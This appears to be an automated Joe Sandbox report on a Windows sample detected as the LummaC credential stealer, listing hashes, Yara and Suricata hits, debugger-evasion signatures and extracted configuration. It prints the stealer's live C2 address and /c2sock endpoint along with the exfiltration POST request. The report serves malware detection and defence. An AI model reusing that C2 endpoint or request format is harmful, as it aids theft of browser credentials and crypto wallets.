Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g1kWKm20Z5.exe

Overview

General Information

Sample name:g1kWKm20Z5.exe
renamed because original name is a hash value
Original sample name:6b3ef3a90ba62f467b95d06765ab128bfec21ea012fd4f1e0927ca0d09169d86.exe
Analysis ID:1555041
MD5:33f4cf8b4c1f6c07e80c74669d31021b
SHA1:a2d722720565ab8659c066aaf693f5b2ad8fb3d3
SHA256:6b3ef3a90ba62f467b95d06765ab128bfec21ea012fd4f1e0927ca0d09169d86
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • g1kWKm20Z5.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\g1kWKm20Z5.exe" MD5: 33F4CF8B4C1F6C07E80C74669D31021B)
    • WerFault.exe (PID: 4248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0xb28:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000003.1693318740.00000000023A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            0.3.g1kWKm20Z5.exe.23a0000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.2.g1kWKm20Z5.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.3.g1kWKm20Z5.exe.23a0000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  0.2.g1kWKm20Z5.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:51:46.541425+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449730TCP
                    2024-11-13T10:52:24.735108+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449877TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:51:06.084853+010020432061A Network Trojan was detected192.168.2.44973694.158.244.6980TCP
                    2024-11-13T10:51:06.084853+010020432061A Network Trojan was detected192.168.2.44994494.158.244.6980TCP
                    2024-11-13T10:52:08.509327+010020432061A Network Trojan was detected192.168.2.44974394.158.244.6980TCP
                    2024-11-13T10:52:17.471003+010020432061A Network Trojan was detected192.168.2.44979394.158.244.6980TCP
                    2024-11-13T10:52:26.456597+010020432061A Network Trojan was detected192.168.2.44984494.158.244.6980TCP
                    2024-11-13T10:52:35.200891+010020432061A Network Trojan was detected192.168.2.44989594.158.244.6980TCP
                    2024-11-13T10:52:53.502274+010020432061A Network Trojan was detected192.168.2.44999194.158.244.6980TCP
                    2024-11-13T10:52:54.285809+010020432061A Network Trojan was detected192.168.2.45001094.158.244.6980TCP
                    2024-11-13T10:53:11.490787+010020432061A Network Trojan was detected192.168.2.45001194.158.244.6980TCP
                    2024-11-13T10:53:20.255945+010020432061A Network Trojan was detected192.168.2.45001294.158.244.6980TCP
                    2024-11-13T10:53:29.154805+010020432061A Network Trojan was detected192.168.2.45001394.158.244.6980TCP
                    2024-11-13T10:53:37.909184+010020432061A Network Trojan was detected192.168.2.45001494.158.244.6980TCP
                    2024-11-13T10:53:46.703991+010020432061A Network Trojan was detected192.168.2.45001594.158.244.6980TCP
                    2024-11-13T10:53:55.471170+010020432061A Network Trojan was detected192.168.2.45001694.158.244.6980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:52:54.285809+010028438641A Network Trojan was detected192.168.2.45001094.158.244.6980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                    Source: g1kWKm20Z5.exeReversingLabs: Detection: 89%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: g1kWKm20Z5.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeUnpacked PE file: 0.2.g1kWKm20Z5.exe.400000.0.unpack
                    Source: g1kWKm20Z5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02382223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02382223

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49743 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49844 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49793 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49895 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50013 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50014 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50015 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50016 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49991 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50012 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50010 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50010 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:50011 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49736 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.4:49944 -> 94.158.244.69:80
                    Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                    Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49877
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 24083Host: 94.158.244.69
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/C
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/D
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/H
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/Q
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/V
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3616223948.0000000003348000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock3
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock6
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock?
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockM
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.0000000003348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockMY
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockh
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockj
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3612917620.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/l
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.00000000009C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                    System Summary

                    barindex
                    Source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B81C0_2_0040B81C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004340800_2_00434080
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040E14E0_2_0040E14E
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040A9280_2_0040A928
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0040B1290_2_0040B129
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042B9C50_2_0042B9C5
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004069A10_2_004069A1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F9A40_2_0041F9A4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041C2700_2_0041C270
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042F2780_2_0042F278
